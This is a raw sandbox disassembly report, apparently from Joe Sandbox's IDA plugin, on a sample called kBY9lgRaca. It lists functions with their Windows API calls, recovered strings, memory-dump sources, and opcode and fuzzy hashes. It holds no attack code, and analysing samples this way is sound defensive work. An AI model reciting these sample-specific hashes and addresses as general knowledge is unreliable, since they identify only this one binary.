                                                                    • Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC7D2
                                                                    • Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC7E4
                                                                    • Part of subcall function 00CDC701: _free.LIBCMT ref: 00CDC7F6
                                                                  • _free.LIBCMT ref: 00CDCB5B
                                                                    • Part of subcall function 00CD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?), ref: 00CD8DE2
                                                                    • Part of subcall function 00CD8DCC: GetLastError.KERNEL32(?,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?,?), ref: 00CD8DF4
                                                                  • _free.LIBCMT ref: 00CDCB7D
                                                                  • _free.LIBCMT ref: 00CDCB92
                                                                  • _free.LIBCMT ref: 00CDCB9D
                                                                  • _free.LIBCMT ref: 00CDCBBF
                                                                  • _free.LIBCMT ref: 00CDCBD2
                                                                  • _free.LIBCMT ref: 00CDCBE0
                                                                  • _free.LIBCMT ref: 00CDCBEB
                                                                  • _free.LIBCMT ref: 00CDCC23
                                                                  • _free.LIBCMT ref: 00CDCC2A
                                                                  • _free.LIBCMT ref: 00CDCC47
                                                                  • _free.LIBCMT ref: 00CDCC5F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                  • String ID:
                                                                  • API String ID: 161543041-0
                                                                  • Opcode ID: e2941b33b8ccb38453ec8f1be40318b8c8a3e33367e08476b8f618ecb0006bfe
                                                                  • Instruction ID: e454c8d9c19927b17821d7b3a659a0633a8913839828daf6bddf7867fbf456e9
                                                                  • Opcode Fuzzy Hash: e2941b33b8ccb38453ec8f1be40318b8c8a3e33367e08476b8f618ecb0006bfe
                                                                  • Instruction Fuzzy Hash: 89314D31600207AFEB20AA39D886B5AB7E9AF94310F10441BE368D7392DF75ED44DB10
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 00CC9736
                                                                  • _wcslen.LIBCMT ref: 00CC97D6
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00CC97E5
                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00CC9806
                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00CC982D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                  • API String ID: 1777411235-4209811716
                                                                  • Opcode ID: 17b08c1c088257d204675d0e8d3d84789f77525d1ace45f28944944c3c2b5903
                                                                  • Instruction ID: 19fe79f5aca1cce7293d9164d55bd749873e7df5b7cbddfb1ce787921debf298
                                                                  • Opcode Fuzzy Hash: 17b08c1c088257d204675d0e8d3d84789f77525d1ace45f28944944c3c2b5903
                                                                  • Instruction Fuzzy Hash: 8E3135325093817BE725AB21DC4AF6FB7A8EF42310F14011EF611972D2EB74DA0583AA
                                                                  APIs
                                                                  • GetWindow.USER32(?,00000005), ref: 00CCD6C1
                                                                  • GetClassNameW.USER32(00000000,?,00000800), ref: 00CCD6ED
                                                                    • Part of subcall function 00CC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CBC116,00000000,.exe,?,?,00000800,?,?,?,00CC8E3C), ref: 00CC1FD1
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00CCD709
                                                                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00CCD720
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00CCD734
                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00CCD75D
                                                                  • DeleteObject.GDI32(00000000), ref: 00CCD764
                                                                  • GetWindow.USER32(00000000,00000002), ref: 00CCD76D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                  • String ID: STATIC
                                                                  • API String ID: 3820355801-1882779555
                                                                  • Opcode ID: 5cb6d6bf2017a306269d10975699114073898d4bcb57ec57a45a4e37600880df
                                                                  • Instruction ID: 07b4ac58bd97f63704941b695c2f3c51d7f9a73ecb86f0ab200e8c5b6023f511
                                                                  • Opcode Fuzzy Hash: 5cb6d6bf2017a306269d10975699114073898d4bcb57ec57a45a4e37600880df
                                                                  • Instruction Fuzzy Hash: 171124721407107BE6206B70DC4AFEF769CAB04711F008128FA12E2196DA74CB4753B5
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00CD9705
                                                                    • Part of subcall function 00CD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?), ref: 00CD8DE2
                                                                    • Part of subcall function 00CD8DCC: GetLastError.KERNEL32(?,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?,?), ref: 00CD8DF4
                                                                  • _free.LIBCMT ref: 00CD9711
                                                                  • _free.LIBCMT ref: 00CD971C
                                                                  • _free.LIBCMT ref: 00CD9727
                                                                  • _free.LIBCMT ref: 00CD9732
                                                                  • _free.LIBCMT ref: 00CD973D
                                                                  • _free.LIBCMT ref: 00CD9748
                                                                  • _free.LIBCMT ref: 00CD9753
                                                                  • _free.LIBCMT ref: 00CD975E
                                                                  • _free.LIBCMT ref: 00CD976C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: 825740f477706f96d8f4d5c94c1b6d02edd62a37b67f30f3259fda5fc59bf0a7
                                                                  • Instruction ID: 893dbb4b8042f665db63b59044348a618755cae58b9c9c293bdb8260748b1448
                                                                  • Opcode Fuzzy Hash: 825740f477706f96d8f4d5c94c1b6d02edd62a37b67f30f3259fda5fc59bf0a7
                                                                  • Instruction Fuzzy Hash: 4611B97511010ABFCB01EF54C842CDD3BB6EF58350B5155A2FB084F2A2DE31DE54AB84
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 322700389-393685449
                                                                  • Opcode ID: dcd00629ce4dffc6bad692d051170bac7ea2e3ae652e6281ec7d9f8c9a387db7
                                                                  • Instruction ID: 797a82ca3d73e340518c24f673cf2d0e68e6c40968de80c324cc41967bb2188a
                                                                  • Opcode Fuzzy Hash: dcd00629ce4dffc6bad692d051170bac7ea2e3ae652e6281ec7d9f8c9a387db7
                                                                  • Instruction Fuzzy Hash: 1CB1783190025AEFCF25DFA4C8819AEBBB5EF14310F14455BEA256B312C731EB11DBA2
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00CB6FAA
                                                                  • _wcslen.LIBCMT ref: 00CB7013
                                                                  • _wcslen.LIBCMT ref: 00CB7084
                                                                    • Part of subcall function 00CB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CB7AAB
                                                                    • Part of subcall function 00CB7A9C: GetLastError.KERNEL32 ref: 00CB7AF1
                                                                    • Part of subcall function 00CB7A9C: CloseHandle.KERNEL32(?), ref: 00CB7B00
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                  • API String ID: 3122303884-3508440684
                                                                  • Opcode ID: 97c9eb1a2fd13bbc3e8cf6e8b0663a56baf9e82cb014800aafc417d320c17131
                                                                  • Instruction ID: 9012601b841108aa1eb80a1124ad8599ccab1038b4ef2242c2d6072bdd182f42
                                                                  • Opcode Fuzzy Hash: 97c9eb1a2fd13bbc3e8cf6e8b0663a56baf9e82cb014800aafc417d320c17131
                                                                  • Instruction Fuzzy Hash: 8741E6B1D08384BAEB20E7749D86FEE77AC9F44304F040556FE5AA7182D674AB48E731
                                                                  APIs
                                                                    • Part of subcall function 00CB1316: GetDlgItem.USER32(00000000,00003021), ref: 00CB135A
                                                                    • Part of subcall function 00CB1316: SetWindowTextW.USER32(00000000,00CE35F4), ref: 00CB1370
                                                                  • EndDialog.USER32(?,00000001), ref: 00CCB610
                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CCB637
                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00CCB650
                                                                  • SetWindowTextW.USER32(?,?), ref: 00CCB661
                                                                  • GetDlgItem.USER32(?,00000065), ref: 00CCB66A
                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00CCB67E
                                                                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00CCB694
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Item$TextWindow$Dialog
                                                                  • String ID: LICENSEDLG
                                                                  • API String ID: 3214253823-2177901306
                                                                  • Opcode ID: e6471c4d2e6a4f9a9d75378555e38439cc062710e193018cbeb9b3c8daf61f05
                                                                  • Instruction ID: d0175ec5135972fdfcae0ecf043e7c83073c12f668c6edabddbbe46d38285c25
                                                                  • Opcode Fuzzy Hash: e6471c4d2e6a4f9a9d75378555e38439cc062710e193018cbeb9b3c8daf61f05
                                                                  • Instruction Fuzzy Hash: 3E218272204305BBE6155FA6ED4BF7B3B6DEB4A741F014018F605D66A0CFA29E02D635
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,BDC6A8D3,00000001,00000000,00000000,?,?,00CBAF6C,ROOT\CIMV2), ref: 00CCFD99
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00CBAF6C,ROOT\CIMV2), ref: 00CCFE14
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00CCFE1F
                                                                  • _com_issue_error.COMSUPP ref: 00CCFE48
                                                                  • _com_issue_error.COMSUPP ref: 00CCFE52
                                                                  • GetLastError.KERNEL32(80070057,BDC6A8D3,00000001,00000000,00000000,?,?,00CBAF6C,ROOT\CIMV2), ref: 00CCFE57
                                                                  • _com_issue_error.COMSUPP ref: 00CCFE6A
                                                                  • GetLastError.KERNEL32(00000000,?,?,00CBAF6C,ROOT\CIMV2), ref: 00CCFE80
                                                                  • _com_issue_error.COMSUPP ref: 00CCFE93
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                  • String ID:
                                                                  • API String ID: 1353541977-0
                                                                  • Opcode ID: 5ae981a47ce30430605ef73bb604f90d9ac251e196f43569cb5717351a8a0548
                                                                  • Instruction ID: 9ace5891104e7a3b9e0dcb5a9e4fd0f7c273b888161b17382a513a4fc825843e
                                                                  • Opcode Fuzzy Hash: 5ae981a47ce30430605ef73bb604f90d9ac251e196f43569cb5717351a8a0548
                                                                  • Instruction Fuzzy Hash: 11412971A00249ABDB10DF69CC45FAFBBAAEB44710F10427EF915E7391D734AA01CBA5
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                  • API String ID: 3519838083-3505469590
                                                                  • Opcode ID: d86704e08a3fbb90ad34eaf74bf47ca55b2befb984a1f6d4fae04168c5bd4888
                                                                  • Instruction ID: 7faad5a5568ef606c0ed66cbc0f5dbce22e0753f3d5fc41df651dac31692d778
                                                                  • Opcode Fuzzy Hash: d86704e08a3fbb90ad34eaf74bf47ca55b2befb984a1f6d4fae04168c5bd4888
                                                                  • Instruction Fuzzy Hash: A1715A71A00259AFDF14DFA5DC99ABEB7B9FF48310F140159E552A72A0CB70AE41CB60
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00CB9387
                                                                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00CB93AA
                                                                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00CB93C9
                                                                    • Part of subcall function 00CBC29A: _wcslen.LIBCMT ref: 00CBC2A2
                                                                    • Part of subcall function 00CC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CBC116,00000000,.exe,?,?,00000800,?,?,?,00CC8E3C), ref: 00CC1FD1
                                                                  • _swprintf.LIBCMT ref: 00CB9465
                                                                    • Part of subcall function 00CB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB40A5
                                                                  • MoveFileW.KERNEL32(?,?), ref: 00CB94D4
                                                                  • MoveFileW.KERNEL32(?,?), ref: 00CB9514
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                  • String ID: rtmp%d
                                                                  • API String ID: 3726343395-3303766350
                                                                  • Opcode ID: 803cb3aa451bb5de7942bc82f11edbe93b866dcd9b645999d9af3ccd652242f9
                                                                  • Instruction ID: 1844bfabb67487b79191b1a8e354518e3baa840cf1a54771015de2cc70eb2d57
                                                                  • Opcode Fuzzy Hash: 803cb3aa451bb5de7942bc82f11edbe93b866dcd9b645999d9af3ccd652242f9
                                                                  • Instruction Fuzzy Hash: 4D4174B1940258A6DF31EBA0CC85EEE737CEF45340F0049A9B759E3151DB789B89EB60
                                                                  APIs
                                                                  • __aulldiv.LIBCMT ref: 00CC122E
                                                                    • Part of subcall function 00CBB146: GetVersionExW.KERNEL32(?), ref: 00CBB16B
                                                                  • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00CC1251
                                                                  • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00CC1263
                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CC1274
                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CC1284
                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CC1294
                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00CC12CF
                                                                  • __aullrem.LIBCMT ref: 00CC1379
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                  • String ID:
                                                                  • API String ID: 1247370737-0
                                                                  • Opcode ID: 45f9de01162abdd91960d301f0e92f3f89fdce72c31ebe63877135e2c327d69e
                                                                  • Instruction ID: 49069fdeeaecf4f3e1d7c48999d8745db35512894ce0608f11c6c0dcb876a659
                                                                  • Opcode Fuzzy Hash: 45f9de01162abdd91960d301f0e92f3f89fdce72c31ebe63877135e2c327d69e
                                                                  • Instruction Fuzzy Hash: CB4107B15083459FC710DF65C884A6FBBE9FB88314F04892EF996C6211E738E649DB51
                                                                  APIs
                                                                  • _swprintf.LIBCMT ref: 00CB2536
                                                                    • Part of subcall function 00CB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB40A5
                                                                    • Part of subcall function 00CC05DA: _wcslen.LIBCMT ref: 00CC05E0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                  • String ID: ;%u$x%u$xc%u
                                                                  • API String ID: 3053425827-2277559157
                                                                  • Opcode ID: 54a2e5999a08bb9e346eecb1273c4210c7d2b0c26815c3f3fbe8c961f166499e
                                                                  • Instruction ID: 63fedac30a7e2e371e42f175a405fe14d549aeed9f80767731754e51833f1298
                                                                  • Opcode Fuzzy Hash: 54a2e5999a08bb9e346eecb1273c4210c7d2b0c26815c3f3fbe8c961f166499e
                                                                  • Instruction Fuzzy Hash: 38F137716043409BCF25EF28C4D5BFE7B996FA0300F08056DFC969B283CB659A49D7A2
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen
                                                                  • String ID: </p>$</style>$<br>$<style>$>
                                                                  • API String ID: 176396367-3568243669
                                                                  • Opcode ID: cddc9e2c131bebd5ac05b403e2fb9fdd06e72d73e39196a23f11e180f3c51f12
                                                                  • Instruction ID: c84de99e8a40d4c82ffc5bae403bfaa2bab6792c46c910c751fbedafda5a966b
                                                                  • Opcode Fuzzy Hash: cddc9e2c131bebd5ac05b403e2fb9fdd06e72d73e39196a23f11e180f3c51f12
                                                                  • Instruction Fuzzy Hash: AE514A66B4036395DB30AA25D819F7673E0DFB1750F68042EFDD29B2C0FB758E818265
                                                                  APIs
                                                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00CDFE02,00000000,00000000,00000000,00000000,00000000,00CD529F), ref: 00CDF6CF
                                                                  • __fassign.LIBCMT ref: 00CDF74A
                                                                  • __fassign.LIBCMT ref: 00CDF765
                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00CDF78B
